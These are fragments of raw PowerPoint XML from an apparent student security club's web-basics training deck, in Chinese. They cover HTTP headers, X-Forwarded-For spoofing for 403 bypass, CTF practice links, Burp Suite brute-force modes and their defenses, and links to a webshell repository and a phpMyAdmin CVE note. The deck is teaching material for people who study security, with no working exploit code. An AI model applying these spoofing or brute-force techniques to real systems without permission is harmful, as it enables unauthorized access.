              <a:ext cx="478632" cy="64871"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>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dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171575" y="2275642"/>
            <a:ext cx="9836150" cy="2171086"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="6600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 4294967294"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7001013" y="5859780"/>
            <a:ext cx="4517887" cy="274320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Presenter name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660400" y="5844540"/>
            <a:ext cx="4517887" cy="274320"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="徽标&#10;&#10;描述已自动生成"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="5460" t="6258" r="5285" b="5520"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="360000"/>
            <a:ext cx="723496" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:hf sldNum="0" hdr="0"/>
</p:sldLayout>
</file>

<file path=ppt/slideMasters/_rels/slideMaster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1.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8">
            <a:alphaModFix amt="15000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="11547"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title Placeholder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altLang="zh-CN"/>
              <a:t>Click to add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder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add text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder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43A25592-9C3F-48AB-9A3F-F2A64B129A6F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660399" y="6409690"/>
            <a:ext cx="3750733"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BITs2Sys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7768168" y="6409690"/>
            <a:ext cx="3750732"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fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8" descr="徽标&#10;&#10;描述已自动生成"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId9" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="5460" t="6258" r="5285" b="5520"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360000" y="360000"/>
            <a:ext cx="723496" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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hyperlink" Target="https://wiki.bafangwy.com/doc/782/"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hyperlink" Target="https://www.runoob.com/http/http-content-type.html"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https://ctf.bugku.com/challenges/detail/id/70.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hyperlink" Target="https://github.com/tennc/webshell" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><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hyperlink" Target="file:///D:\BaiduSyncdisk\&#22823;&#23398;&#36164;&#26009;\&#31532;&#20116;&#23398;&#26399;\&#23567;&#23398;&#26399;\&#31532;&#19968;&#27425;&#20316;&#19994;\CVE-2018-12613\phpmyadmin%204.8.1%20&#36828;&#31243;&#25991;&#20214;&#21253;&#21547;&#28431;&#27934;.md" TargetMode="Externa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hyperlink" Target="file:///D:\BaiduSyncdisk\bafangwy\xiaodi&#23398;&#20064;&#26041;&#21521;.txt" TargetMode="External"/><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hyperlink" Target="https://src.sjtu.edu.cn/list/firm/3114" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.butian.net/"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hyperlink" Target="https://www.runoob.com/http/http-status-code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BITs2Sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>招新培训</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Subtitle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>基础第一次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>培训</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>杨姚</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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175" y="447675"/>
            <a:ext cx="4064000" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>常见请求头和响应头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642620" y="6346190"/>
            <a:ext cx="5325110" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://wiki.bafangwy.com/doc/782/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397000" y="1092835"/>
            <a:ext cx="7228205" cy="3213735"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1397000" y="4528820"/>
            <a:ext cx="9058910" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：表示请求从哪个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>来的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>X-Forwarded-For</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：表示客户端的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，常用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪造，有时能实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>403</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过</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6355" y="101600"/>
            <a:ext cx="4064000" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>HTTP content-type</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="487680" y="5956300"/>
            <a:ext cx="7894955" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://www.runoob.com/http/http-content-type.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1316355" y="501015"/>
            <a:ext cx="7912735" cy="52946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7305" y="436245"/>
            <a:ext cx="4064000" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>习题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297305" y="2723515"/>
            <a:ext cx="7717155" cy="1208405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId1" action="ppaction://hlinkfile"/>
              </a:rPr>
              <a:t>https://ctf.bugku.com/challenges/detail/id/70.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻防世界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>-xff_referer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BUUCTF-[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>极客大挑战</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> 2019]Http</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zh-CN" dirty="0"/>
              <a:t>1.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>暴力破解</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4300" y="546735"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>暴力破解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576070" y="1424940"/>
            <a:ext cx="8317230" cy="4496435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>p</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>python</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方法：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字典</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>爆破</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字典</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>生成</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防御：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>限制错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>次数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>验证码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>二因素</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>认证</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6835" y="497840"/>
            <a:ext cx="4064000" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>暴力破解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970280" y="1497330"/>
            <a:ext cx="9863455" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>假设有两个替换点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，原内容用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表示，替换内容用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>pay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>表示</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Spiper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：发送两个包，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>a=pay&amp;b=ori  a=ori&amp;b=pay</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Battering ram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：发送一个包，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>a=pay&amp;b=pay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，即所有地方都替换成一样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Pitchfork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>a=pay1&amp;b=payA   a=pay2&amp;b=payB  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>共发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>max{m, n}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个包</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Cluster bomb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>a=pay1&amp;b=payA   a=pay2&amp;b=payA  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>共发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>m*n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
